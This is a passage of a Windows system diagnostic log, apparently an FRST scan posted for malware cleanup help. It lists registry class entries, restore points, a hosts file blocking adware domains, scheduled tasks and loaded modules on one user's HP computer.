CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\Ken Terry\AppData\Local\Citrix\GoToMeeting\1350\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001_Classes\CLSID\{CC99A798-FD3D-4AB4-969E-6071612524F9}\InprocServer32 -> C:\PROGRA~2\APPGRA~1\APPGRA~2.DLL No File
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)

==================== Restore Points =========================

20-08-2015 12:36:50 Intel Driver Update Utility
06-09-2015 07:42:41 Windows Update
06-09-2015 07:43:15 Windows Update
18-09-2015 11:08:12 Removed Internet Explorer Toolbar 4.8 by SweetPacks

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2015-09-18 17:09 - 00001993 ____A C:\WINDOWS\system32\Drivers\etc\hosts
0.0.0.0 0.0.0.0 # fix for traceroute and netstat display anomaly
0.0.0.0 tracking.opencandy.com.s3.amazonaws.com
0.0.0.0 media.opencandy.com
0.0.0.0 cdn.opencandy.com
0.0.0.0 tracking.opencandy.com
0.0.0.0 api.opencandy.com
0.0.0.0 installer.betterinstaller.com
0.0.0.0 installer.filebulldog.com
0.0.0.0 d3oxtn1x3b8d7i.cloudfront.net
0.0.0.0 inno.bisrv.com
0.0.0.0 nsis.bisrv.com
0.0.0.0 cdn.file2desktop.com
0.0.0.0 cdn.goateastcach.us
0.0.0.0 cdn.guttastatdk.us
0.0.0.0 cdn.inskinmedia.com
0.0.0.0 cdn.insta.oibundles2.com
0.0.0.0 cdn.insta.playbryte.com
0.0.0.0 cdn.llogetfastcach.us
0.0.0.0 cdn.montiera.com
0.0.0.0 cdn.msdwnld.com
0.0.0.0 cdn.mypcbackup.com
0.0.0.0 cdn.ppdownload.com
0.0.0.0 cdn.riceateastcach.us
0.0.0.0 cdn.shyapotato.us
0.0.0.0 cdn.solimba.com
0.0.0.0 cdn.tuto4pc.com
0.0.0.0 cdn.appround.biz
0.0.0.0 cdn.bigspeedpro.com
0.0.0.0 cdn.bispd.com

There are 4 more lines.


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {019FAEB9-DE73-4325-B2EF-1FB94C02797F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_CN36P1C24C => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2015-07-31] (Hewlett-Packard)
Task: {0575BE02-A6EE-442D-84BA-6E466B1ADDA4} - System32\Tasks\Norton Internet Security\Norton Error Processor => C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\SymErr.exe [2015-05-19] (Symantec Corporation)
Task: {0614E216-9586-4DC9-9417-9663E71FFA81} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {0735030B-ACB7-461E-9BE5-57D90FBDD44F} - System32\Tasks\ServicePlan => C:\Program Files (x86)\Hewlett-Packard\HP Setup\RemEngine.exe [2010-05-25] ()
Task: {082D6E95-F773-4356-9836-A3BC99BE6316} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2015-07-31] (Hewlett-Packard)
Task: {09DD22EA-249F-4834-94E9-2F324E944E0D} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {0A3D5C40-0D8C-4838-B27B-2FB17CDD725A} - System32\Tasks\ReasonSecurityScheduledScan => C:\Program Files\Reason\Security\rsUI.exe [2015-08-12] (Reason Software Company Inc.)
Task: {0DEEEEC8-981B-4F62-A548-60F43BA51A88} - System32\Tasks\{AC04BF1E-4705-426E-A81A-68766D098983} => C:\Program Files\Microprose\Test of Time\civ2.exe
Task: {0E8551ED-005D-40C6-90E3-80D5843F8DBB} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
Task: {0F4CE965-6DC4-4AD4-B1A7-3777DD1E4B3C} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-2815594105-2774959023-4293743994-1001UA => C:\Users\Ken Terry\AppData\Local\Facebook\Update\FacebookUpdate.exe [2013-05-02] (Facebook Inc.)
Task: {13A842CD-2D18-4CDE-BDED-0322327FBA93} - System32\Tasks\Norton Internet Security\Norton Autofix => C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\SymErr.exe [2015-05-19] (Symantec Corporation)
Task: {1AFD0B96-A1C4-4390-8DCC-F0DCA1AA1D38} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {252D80EC-5538-4573-A055-6E1D3A694018} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {274C79CE-8EC2-43EC-8A18-CFB2D009B0C5} - System32\Tasks\{0B5CA40B-CCD8-490F-8D68-7EA32D64D307} => Chrome.exe Download Skype for Desktop
Task: {27C411B7-E322-486B-938E-48EF225CFC07} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {2F0B2903-9F5B-4E96-8394-51698C1980DD} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {348C90BE-EEA1-41F3-B6A0-41F1316471C2} - System32\Tasks\{C03B42C0-562C-4C8E-ABB1-BCC55840222D} => pcalua.exe -a "C:\Program Files (x86)\RealArcade\Installer\bin\gameinstaller.exe" -d "C:\Users\Ken Terry\Desktop" -c "C:\Program Files (x86)\RealArcade\Installer\bin\..\installerMain.clf" "C:\Users\Ken Terry\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UWX1MMZ4\gameInitializer.rgi"
Task: {3691FF85-D708-409B-BE7A-284ADA2BCFB2} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {392AAB2B-15F7-48B1-B07E-0BE480D834F6} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {4174D0B1-D662-4442-BE05-E74FDA7AB687} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {42CB8764-2045-4238-A56E-751CB98D902F} - System32\Tasks\{C1A4BDAD-939C-43EF-907F-28334BD79BB7} => C:\Program Files\Microprose\Test of Time\civ2.exe
Task: {48B91E1C-EA75-45BE-8543-753C2C55D001} - System32\Tasks\{3965E5E4-5DC0-480F-8941-5B8FADC1F1BF} => pcalua.exe -a "C:\Users\Ken Terry\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ML6YDOY\clipart.exe" -d "C:\Users\Ken Terry\Desktop"
Task: {4A5DF7C8-D78A-4D9F-BBE7-2944B2FAC8A9} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {5A11E9D0-9BEF-4039-B3A7-C4F415E22876} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {5CCAC33B-323F-456B-A658-29D10B7A2BC9} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-2815594105-2774959023-4293743994-1001Core => C:\Users\Ken Terry\AppData\Local\Facebook\Update\FacebookUpdate.exe [2013-05-02] (Facebook Inc.)
Task: {602633A2-45A9-4907-99A7-8F427E57141A} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-2815594105-2774959023-4293743994-1001Core => C:\Users\Ken Terry\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2015-06-21] (Dropbox, Inc.)
Task: {622B0FEF-744E-41A0-90BD-F6289575A86B} - System32\Tasks\{D77C141C-EED4-4EF9-AE1C-B317422E4B19} => C:\Program Files\Microprose\Test of Time\civ2.exe
Task: {66326039-7E18-4663-9D67-5428B639B0B9} - System32\Tasks\HPCustParticipation HP Officejet 6700 => C:\Program Files\HP\HP Officejet 6700\Bin\HPCustPartic.exe [2011-09-09] (Hewlett-Packard Co.)
Task: {70C1C77B-1029-4321-922D-34762534CCC2} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\WSCStub.exe [2015-07-16] (Symantec Corporation)
Task: {732DD6B7-9D18-41FD-AF3F-FFA23A1C32E7} - System32\Tasks\G2MUpdateTask-S-1-5-21-2815594105-2774959023-4293743994-1001 => C:\Users\Ken Terry\AppData\Local\Citrix\GoToMeeting\2553\g2mupdate.exe [2015-04-13] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {75E207A5-0575-446A-974A-D178024369F1} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {76CFB17D-5351-43AA-9A4A-42D3AE0F1E9D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {7B0DFFF0-6088-41CF-A75A-878BA845C91F} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {7EC4AA3B-22D1-4CF4-AECB-10E91C4B3D7C} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
Task: {8465E2C1-36AD-4EA3-8ECA-5C561635B621} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {88220C49-B2D1-499A-88AC-C3F337621C63} - System32\Tasks\HPOSIAPP64 => C:\Program Files (x86)\Hewlett-Packard\HP MAINSTREAM KEYBOARD\ModLEDKey.exe [2009-02-27] ()
Task: {88C36CB1-AC36-484B-9A22-08384DDEB631} - System32\Tasks\{C98CDA24-32EA-40BA-80F3-F3E87214F500} => C:\Program Files\Microprose\Test of Time\civ2.exe
Task: {8C7A34A2-0D24-43CE-8C4C-7090004B739A} - System32\Tasks\RecoveryCDWin7 => C:\Program Files (x86)\Hewlett-Packard\HP Setup\RemEngine.exe [2010-05-25] ()
Task: {95D7899D-9F6E-4E00-9DA9-28752154DC13} - System32\Tasks\ReasonSecurityStart => C:\Program Files\Reason\Security\rsUI.exe [2015-08-12] (Reason Software Company Inc.)
Task: {9D68AD1A-3850-45B6-BC03-009D74EB709E} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {9EC1E636-54B5-4327-8358-8B19E18D1D43} - System32\Tasks\{CB605BE0-B948-4F3E-8FEF-C445F5C182DE} => pcalua.exe -a "C:\Users\Ken Terry\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UWX1MMZ4\jre-6u26-windows-i586-iftw.exe" -d "C:\Users\Ken Terry\Desktop"
Task: {A1D35F98-7D4F-4EC2-9239-00601DC46FCE} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {A489B528-91C6-4184-A0AF-723508AC6495} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {A49D85A9-EDF9-405B-A799-CAB721A8BEEB} - System32\Tasks\Microsoft_Hardware_Launch_IPoint_exe => C:\Program Files\Microsoft IntelliPoint\IPoint.exe [2010-07-21] (Microsoft Corporation)
Task: {A894259E-D7D0-41BB-AED3-1D8F66401E39} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {AA9C9B64-9F27-40AB-8513-751DA031862B} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2014-05-12] (Hewlett-Packard Company)
Task: {B10439E1-E185-4DB2-807B-DD6AC98B530E} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {B86B0DB9-4A6D-4063-8CAA-F4A9DD92C215} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_CN2CC9SMG4 => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2015-07-31] (Hewlett-Packard)
Task: {B92A5C1F-2083-497F-B44F-60F380623673} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {C4D5D3CC-58F8-43D2-AC4F-FA91F4439F57} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {CFABD2B9-4772-4521-9405-76C50451DAEB} - System32\Tasks\HPCeeScheduleForKen Terry => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15] (Hewlett-Packard)
Task: {D79D3569-3255-4B3C-BFBE-3FF4BAAE1A39} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-08-11] (Adobe Systems Incorporated)
Task: {E56BA0AB-FE56-4C67-9AB5-01B1F903A2BE} - System32\Tasks\Norton Internet Security\Norton Error Analyzer => C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\SymErr.exe [2015-05-19] (Symantec Corporation)
Task: {E5B6457C-F5F9-4E3A-98D5-71C44AA0148E} - System32\Tasks\{00545BF5-217A-4D18-9F0F-36D7DE53FCFD} => C:\Program Files\Microprose\Test of Time\civ2.exe
Task: {E8FA7856-F1C0-48C9-88EE-4613503C97E8} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {EC1C883A-07E5-4FAC-AA5E-84DE307C080F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {F16B6BC2-9F7B-441F-BBB2-7680B691E92E} - System32\Tasks\AdobeAAMUpdater-1.0-KenTerry-HP-Ken Terry => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2015-02-03] (Adobe Systems Incorporated)
Task: {F51BD286-3A30-4E1B-B378-563861E37E9E} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-2815594105-2774959023-4293743994-1001UA => C:\Users\Ken Terry\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2015-06-21] (Dropbox, Inc.)
Task: {F7F9BDB0-A368-4E09-9ED0-7931DF6EBE1A} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-07-07] (Adobe Systems Incorporated)
Task: {F809B3DB-23B7-4759-B88C-17638039582F} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {F8B77A2C-235E-49CC-A4C5-73D32C5469B1} - System32\Tasks\HP Photo Creations Communicator => C:\ProgramData\HP Photo Creations\Communicator.exe [2013-03-16] ()
Task: {FC168DBD-8327-4CC8-BEBE-28B294DC8806} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-2815594105-2774959023-4293743994-1001Core.job => C:\Users\Ken Terry\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-2815594105-2774959023-4293743994-1001UA.job => C:\Users\Ken Terry\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-2815594105-2774959023-4293743994-1001Core.job => C:\Users\Ken Terry\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-2815594105-2774959023-4293743994-1001UA.job => C:\Users\Ken Terry\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\WINDOWS\Tasks\G2MUpdateTask-S-1-5-21-2815594105-2774959023-4293743994-1001.job => C:\Users\Ken Terry\AppData\Local\Citrix\GoToMeeting\2553\g2mupdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\HP Photo Creations Communicator.job => C:\ProgramData\HP Photo Creations\Communicator.exe
Task: C:\WINDOWS\Tasks\HPCeeScheduleForKen Terry.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

==================== Loaded Modules (Whitelisted) ==============

2015-08-11 21:52 - 2015-08-11 21:52 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
2015-01-20 23:35 - 2015-01-20 23:35 - 00085832 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-05-15 16:26 - 2015-05-15 16:26 - 01346344 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2015-08-19 00:05 - 2015-08-11 04:14 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-09-12 12:50 - 2015-09-12 12:50 - 00163576 _____ () C:\Program Files\Reason\Security\Protection\rscp\bin\rscp_svc.exe
2015-07-16 05:45 - 2015-07-16 05:45 - 00105112 _____ () C:\Program Files (x86)\Intel Driver Update Utility\SUR\SurSvc.exe
2015-08-19 00:05 - 2015-07-30 01:05 - 02498808 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2010-08-18 02:55 - 2009-02-27 21:13 - 00053248 _____ () C:\Program Files (x86)\Hewlett-Packard\HP MAINSTREAM KEYBOARD\ModLEDKey.exe
2015-08-19 00:05 - 2015-07-30 01:05 - 02498808 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2015-09-12 12:50 - 2015-09-12 12:50 - 00401144 _____ () C:\Program Files\Reason\Security\Protection\rscp\bin\rscp_bg.exe
2015-07-10 05:59 - 2015-07-10 05:59 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-08-19 00:05 - 2015-08-02 20:11 - 06569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-07-10 06:00 - 2015-07-10 08:14 - 00471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-08-19 00:05 - 2015-08-11 03:58 - 01808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-08-19 00:05 - 2015-08-02 20:09 - 02274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2010-01-18 12:21 - 2010-01-18 12:21 - 00568888 _____ () C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
2014-09-11 10:39 - 2015-07-21 00:02 - 05887808 _____ () C:\Users\Ken Terry\AppData\Local\Amazon Music\Amazon Music Helper.exe
2011-02-03 18:39 - 2007-12-14 17:58 - 00241664 _____ () C:\Program Files (x86)\Philips\Philips SPC230NC Webcam\TrayMin230.exe
2015-08-20 12:37 - 2015-07-16 05:52 - 00413848 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\esrv_svc.exe
2015-08-20 12:37 - 2015-07-16 05:59 - 00709272 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\intel_modeler.dll
2015-08-20 12:37 - 2015-07-16 05:56 - 00130712 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\intel_process_input.dll
2015-08-20 12:37 - 2015-07-16 05:56 - 00025752 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\intel_system_power_state_input.dll
2015-08-20 12:37 - 2015-07-16 05:56 - 00059544 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\intel_quality_and_reliability_input.dll
2015-08-20 12:37 - 2015-07-16 05:57 - 00194712 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\acpi_battery_input.dll
2015-08-20 12:37 - 2015-07-16 05:58 - 00159896 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\sema_thermal_input.dll
2015-08-20 12:37 - 2015-07-16 05:58 - 00158360 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\wifi_input.dll
2015-08-20 12:37 - 2015-07-16 05:57 - 00050840 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\devices_use_input.dll
2015-08-20 12:37 - 2015-07-16 05:55 - 00032920 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\intel_disktrace_input.dll
2015-09-18 17:12 - 2015-09-18 17:12 - 00071168 _____ () c:\Users\Ken Terry\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpvbbmmf.dll
2015-03-04 16:45 - 2015-08-05 00:26 - 00012800 _____ () C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\QtQuick.2\qtquick2plugin.dll
2015-03-04 16:45 - 2015-08-05 00:26 - 00779776 _____ () C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\QtQuick\Controls\qtquickcontrolsplugin.dll
2015-07-30 18:00 - 2015-08-05 00:26 - 00056320 _____ () C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\QtQuick\Layouts\qquicklayoutsplugin.dll
2015-03-04 16:45 - 2015-08-05 00:26 - 00012288 _____ () C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\QtQuick\Window.2\windowplugin.dll
2013-03-07 21:32 - 2013-03-07 21:32 - 00292272 _____ () C:\Users\Ken Terry\AppData\Local\Facebook\Messenger\2.1.4814.0\CefSharp.dll
2013-03-07 21:32 - 2013-03-07 21:32 - 21014960 _____ () C:\Users\Ken Terry\AppData\Local\Facebook\Messenger\2.1.4814.0\libcef.dll
2013-03-07 21:32 - 2013-03-07 21:32 - 00179632 _____ () C:\Users\Ken Terry\AppData\Local\Facebook\Messenger\2.1.4814.0\CefSharp.WinForms.dll
2010-08-18 02:55 - 2009-02-19 19:22 - 00028672 _____ () C:\Program Files (x86)\Hewlett-Packard\HP MAINSTREAM KEYBOARD\WMINPUT.DLL
2010-11-22 17:56 - 2010-11-22 17:56 - 00087040 _____ () C:\Program Files (x86)\Raptr\_ctypes.pyd
2010-11-22 17:56 - 2010-11-22 17:56 - 00043008 _____ () C:\Program Files (x86)\Raptr\_socket.pyd
2010-11-22 17:56 - 2010-11-22 17:56 - 00805376 _____ () C:\Program Files (x86)\Raptr\_ssl.pyd
2014-05-13 18:26 - 2014-05-13 18:26 - 05812736 _____ () C:\Program Files (x86)\Raptr\PyQt4.QtGui.pyd
2014-05-13 18:26 - 2014-05-13 18:26 - 00067584 _____ () C:\Program Files (x86)\Raptr\sip.pyd
2014-05-13 18:26 - 2014-05-13 18:26 - 01662464 _____ () C:\Program Files (x86)\Raptr\PyQt4.QtCore.pyd
2014-05-13 18:26 - 2014-05-13 18:26 - 00494592 _____ () C:\Program Files (x86)\Raptr\PyQt4.QtNetwork.pyd
2010-11-22 17:57 - 2010-11-22 17:57 - 00096256 _____ () C:\Program Files (x86)\Raptr\win32api.pyd
2010-11-22 17:56 - 2010-11-22 17:56 - 00110592 _____ () C:\Program Files (x86)\Raptr\pywintypes26.dll
2010-11-22 17:56 - 2010-11-22 17:56 - 00010240 _____ () C:\Program Files (x86)\Raptr\select.pyd
2010-11-22 17:56 - 2010-11-22 17:56 - 00356864 _____ () C:\Program Files (x86)\Raptr\_hashlib.pyd
2010-11-22 17:57 - 2010-11-22 17:57 - 00036352 _____ () C:\Program Files (x86)\Raptr\win32process.pyd
